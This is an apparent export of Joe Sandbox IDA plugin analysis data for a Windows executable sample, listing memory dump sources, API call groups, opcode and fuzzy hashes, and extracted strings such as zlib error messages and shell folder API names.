                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
                                      • Instruction ID: 85eb21683fd68773ec3f68e7974a7ba45b0d300be2a951898864618d3eded784
                                      • Opcode Fuzzy Hash: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
                                      • Instruction Fuzzy Hash: D4F030B6624694CBCB10DF39E00166977B0F349B48F200416EF4847764DB36C992CF10
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory
                                      • String ID:
                                      • API String ID: 1611563598-0
                                      • Opcode ID: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                      • Instruction ID: d26b75307fbf4d2f65b3bf59e092d1c76b80437de534da0d48005b48f8adbafa
                                      • Opcode Fuzzy Hash: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                      • Instruction Fuzzy Hash: 74C09B74663002C1FA6A936328A97E451905B0C391F504511F7064117089BD14975530
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CreateHeap
                                      • String ID:
                                      • API String ID: 10892065-0
                                      • Opcode ID: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
                                      • Instruction ID: 2c080862c33f0b7fb519294060e944d109da0d65108c87cfa11e07f441f421b0
                                      • Opcode Fuzzy Hash: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
                                      • Instruction Fuzzy Hash: 40C02B34712690C2E3492323AC033991090F34C3C0FD02018F60102770CE3D80A70B00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
                                      • String ID: BUTTON$C$EDIT$P$STATIC$n
                                      • API String ID: 9748049-1690119102
                                      • Opcode ID: 3672b20c3f93e9cafd23a15c04167ab05239bdad4ad45a7c7ed3e5f5fd201a6e
                                      • Instruction ID: 503d67efbf07ff6f248b06a67c50be69490569a40db1ce31eb7df8f18fb995d6
                                      • Opcode Fuzzy Hash: 3672b20c3f93e9cafd23a15c04167ab05239bdad4ad45a7c7ed3e5f5fd201a6e
                                      • Instruction Fuzzy Hash: 59D134B5605B4086EB12DB62F8447AA77A5FB8CBC8F404129AF4A47B79DF7DC4498B00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                      • API String ID: 0-2665694366
                                      • Opcode ID: 022d8aec80773364c7782894b492e5bf51f6f0f1ab81dba49e519fa5dfe17589
                                      • Instruction ID: 63a129330255db97eb1aabb126bfc5b4551e8f686405ea2d62c327762663274b
                                      • Opcode Fuzzy Hash: 022d8aec80773364c7782894b492e5bf51f6f0f1ab81dba49e519fa5dfe17589
                                      • Instruction Fuzzy Hash: FB620572A106A48BE799CF25D498BED3BF9F748780F518129FB468B7A0E739C845C740
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $header crc mismatch$unknown compression method$unknown header flags set
                                      • API String ID: 0-4074041902
                                      • Opcode ID: 678d21ef58d4a875124531cd8bb27c6309f94b37c07dc777e5a796b3eb271508
                                      • Instruction ID: 440100e0ad3e42c115cce95f3fb78f0a990aae4413b5501bd8dd5ba0711be261
                                      • Opcode Fuzzy Hash: 678d21ef58d4a875124531cd8bb27c6309f94b37c07dc777e5a796b3eb271508
                                      • Instruction Fuzzy Hash: 7A02B1726007949BEBA78F16C488BAE3BE9FB4CB94F164518EF894B7A0D775C940C740
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: invalid distance code$invalid distance too far back$invalid literal/length code
                                      • API String ID: 0-3255898291
                                      • Opcode ID: e9ea9672f90cea75fd930f9b725da38f325f2299c3bc13611abce9c87a4e8c41
                                      • Instruction ID: 3f1348f65b8f8bda14ba5cdfa7bf6f02fc8c4dbb68883e69d1ec2b1899c7470d
                                      • Opcode Fuzzy Hash: e9ea9672f90cea75fd930f9b725da38f325f2299c3bc13611abce9c87a4e8c41
                                      • Instruction Fuzzy Hash: C5D138326186D08BD71A8F3AD8447BD7FA1F3993C4F54811AEB968B791D63DCA4AC700
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: incorrect header check$invalid window size$unknown compression method
                                      • API String ID: 0-1186847913
                                      • Opcode ID: e5d9ef9cb6cfd683bb0b87efb43f2fbb65f2835d92bd1581f31df26c1c39ce5d
                                      • Instruction ID: c7f0437dc46e56fef3014f932af091831cb3ca76e565b5a088b3fef6b265a946
                                      • Opcode Fuzzy Hash: e5d9ef9cb6cfd683bb0b87efb43f2fbb65f2835d92bd1581f31df26c1c39ce5d
                                      • Instruction Fuzzy Hash: 9391A2726106949BFBA6CF26C584B9E3BA9F70C794F114229EB464BBE1C736D950CB00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $ $invalid block type
                                      • API String ID: 0-2056396358
                                      • Opcode ID: 44e2e5f460598a6c66844f3403f38ee68ad68f3f2a55e5b147868c764788a378
                                      • Instruction ID: 6826abb0ae9e935998ffe99ae2e08a78a36fe9b187ecd4f73c4f7ab9da41e151
                                      • Opcode Fuzzy Hash: 44e2e5f460598a6c66844f3403f38ee68ad68f3f2a55e5b147868c764788a378
                                      • Instruction Fuzzy Hash: 7161E3B3510B949BE766CF26C8887AD3BE8F708394F554229EB558B7E0D73AC490CB40
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: memmove
                                      • String ID:
                                      • API String ID: 2162964266-0
                                      • Opcode ID: b2a6db502280213d3f7fe6332d1fff197779c33e7365e9d34c0e6334cca0ff18
                                      • Instruction ID: c8f745e53e58f4d3ff63e30af0f782c513ee99f48fb140b821e661274e727f8d
                                      • Opcode Fuzzy Hash: b2a6db502280213d3f7fe6332d1fff197779c33e7365e9d34c0e6334cca0ff18
                                      • Instruction Fuzzy Hash: 1DC291B3A282408BD368CF69E85665BB7A1F7D8748F45A029FB87D3B44D63CD9018F44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 28a696735792be4af076da833e5dcb064fa3499b6e6f110371e014232abd0523
                                      • Instruction ID: 022ba38ea2fc746ee1b0595bfd7f682d53a7df84c20089d95d53e5e85305b389
                                      • Opcode Fuzzy Hash: 28a696735792be4af076da833e5dcb064fa3499b6e6f110371e014232abd0523
                                      • Instruction Fuzzy Hash: E32283B7F744204BD71DCB69EC52FE836A2B75434C709A02CAA17D3F44EA3DEA158A44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 503b61509a6e7d9b6eb4f9c1519d37c0dc2229192933667b3bc723eba56df74c
                                      • Instruction ID: f294bca1e54ba5f97cd1887ffa6c8c7d976b4678fb34f7ffe8470b0002a4fcc7
                                      • Opcode Fuzzy Hash: 503b61509a6e7d9b6eb4f9c1519d37c0dc2229192933667b3bc723eba56df74c
                                      • Instruction Fuzzy Hash: 7B8150733301749BE7668A2EA514BE93290F3693CEFC56115FB8487B45CA3EB921CB50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6b12c9a6a7ee3862a54880f18472b54e1903d2b01c5643e5ee2caa8c01718eea
                                      • Instruction ID: e67d2bfc1a2697f1f60af7736c02a9787f64ff3490f4c327f028a03746ec3e44
                                      • Opcode Fuzzy Hash: 6b12c9a6a7ee3862a54880f18472b54e1903d2b01c5643e5ee2caa8c01718eea
                                      • Instruction Fuzzy Hash: FE715CB23301749BEB658B2E9514BE93390F36A349FC56105EB855BB81CE3EB921CF50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
                                      • Instruction ID: b94fce4af05d2a3b47cf10f4c42de706c870d6d3f1c440dba90fb4ad6b70bb1c
                                      • Opcode Fuzzy Hash: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
                                      • Instruction Fuzzy Hash: 3941BB32310640CAFBAA9B1AE020BEE3691E7997C5FD49115DB819FAF0D63BD4058B40
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
                                      • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                      • API String ID: 217932011-4219398408
                                      • Opcode ID: c6f64f31bbdd53e5c9615b97b996e53b9347b52efb9bfdd58b217e32d9a890a1
                                      • Instruction ID: f53257261a77fa7679be829afa5858120bcd1a05ac071047bacb850080d37645
                                      • Opcode Fuzzy Hash: c6f64f31bbdd53e5c9615b97b996e53b9347b52efb9bfdd58b217e32d9a890a1
                                      • Instruction Fuzzy Hash: F7418D72211B8082EB16EF12E8443EA73A4F78CBC8F544125EB4A477A5EF39C95AC700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                                      • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                      • API String ID: 1740785346-287042676
                                      • Opcode ID: e5bab1e40f8d65dd4e7d5d62996c70c4389265927e72bd1646414111646def34
                                      • Instruction ID: ffb59ae5301eeda9161766390bd85b6f914ac2b2dd013f36d3426db2d5643a12
                                      • Opcode Fuzzy Hash: e5bab1e40f8d65dd4e7d5d62996c70c4389265927e72bd1646414111646def34
                                      • Instruction Fuzzy Hash: A64186B1214A46C2FA27EB57B4947F97291AB8C7D0F540127BB0A0B7F5DEB9C841C611
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                      • String ID:
                                      • API String ID: 298514914-0
                                      • Opcode ID: aef90992288fd509fbd74998ffb1029e6b7b59a5f56d271f65cebbdd5f433d17
                                      • Instruction ID: 0ebcb89b5f496a055c7edd3f2936d7e00332f328880e18a7a0f049a68aa3c175
                                      • Opcode Fuzzy Hash: aef90992288fd509fbd74998ffb1029e6b7b59a5f56d271f65cebbdd5f433d17
                                      • Instruction Fuzzy Hash: 0641E172201B409AEB129F62E8447A977A0F78CBD5F484129EB4D0B774DF39C999D740
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: _wcsdupfreewcsncpy$Value
                                      • String ID:
                                      • API String ID: 1554701960-0
                                      • Opcode ID: 39699e6607edbd281478320c41bc5aaf7562ab5abe15b46f77e1710a2ecc13f5
                                      • Instruction ID: da1d114085ca4aa9233c1495fb0579f216bdf29e57c82a9bb0fca7f891cc91e6
                                      • Opcode Fuzzy Hash: 39699e6607edbd281478320c41bc5aaf7562ab5abe15b46f77e1710a2ecc13f5
                                      • Instruction Fuzzy Hash: AE91BFB2604A8185EA76DF13B9507EA73A0FB48BD5F484225BFCA476E5EB38C542C701
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                       • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Window$ClassDestroyEnableProcUnregister
                                      • String ID:
                                      • API String ID: 1570244450-0
                                      • Opcode ID: fc5dfa83332df02ed0060d8fb174e8f27900349cc90facb9f358c39e73375a0a
                                      • Instruction ID: a4636e2d5cbf899b35d7322a6c98c02ffc5b8df7e19630505cb7187d8542c3a3
                                      • Opcode Fuzzy Hash: fc5dfa83332df02ed0060d8fb174e8f27900349cc90facb9f358c39e73375a0a
                                      • Instruction Fuzzy Hash: 4A210BB4204A5182FB56DB27F8483B923A1E78CBC1F549026FB4A4B7B5DF3DC8859700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                       • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                      • String ID:
                                      • API String ID: 3383493704-0
                                      • Opcode ID: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                      • Instruction ID: 80f857dfb6a9a2f530fca3cb10c8fb692f8ca5f83b5b0ec86a1534c3d91aadad
                                      • Opcode Fuzzy Hash: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                      • Instruction Fuzzy Hash: 9D11397020064182EB46AB27A9483B962A1EB8CBC4F448024FA0A4B6B5DF7DC5458301
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                       • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadProcSleep
                                      • String ID: InitOnceExecuteOnce$Kernel32.dll
                                      • API String ID: 938261879-1339284965
                                      • Opcode ID: 72da134d983737982ac4ef6395f0fd6253c9f3b81f1b0775f7966da8eab3fff3
                                      • Instruction ID: b5645326e5d4f07ede329690aacabb45cf3e43243987f71da7b0cd1098b1f21b
                                      • Opcode Fuzzy Hash: 72da134d983737982ac4ef6395f0fd6253c9f3b81f1b0775f7966da8eab3fff3
                                      • Instruction Fuzzy Hash: B4118F3120874585EB5ADF57A8843E973A0EB8CBD0F488029AB0A0B666EF3AC595C740
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                       • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Window$CurrentThread$EnableEnumWindows
                                      • String ID:
                                      • API String ID: 2527101397-0
                                      • Opcode ID: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                      • Instruction ID: 08829170a8ee5f1b49cfdf050f6537c1ef42b3a6330418e8cb94bb4851fba9f1
                                      • Opcode Fuzzy Hash: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                      • Instruction Fuzzy Hash: 6D3171B261064182FB62CF22F5487A977A1F75CBE9F484215FB6947AF9CB79C844CB00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                       • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: AllocValue$Heap
                                      • String ID:
                                      • API String ID: 2472784365-0
                                      • Opcode ID: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                      • Instruction ID: 773301f083ee798336704ec3d5312664b9b868eef9dc2a5d6ba13fea1fa7b4fd
                                      • Opcode Fuzzy Hash: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                      • Instruction Fuzzy Hash: 3821F434200B8096EB4A9B92F8843E963A5F7DCBD0F548429FB4D47B79DE3DC8858740
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                       • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
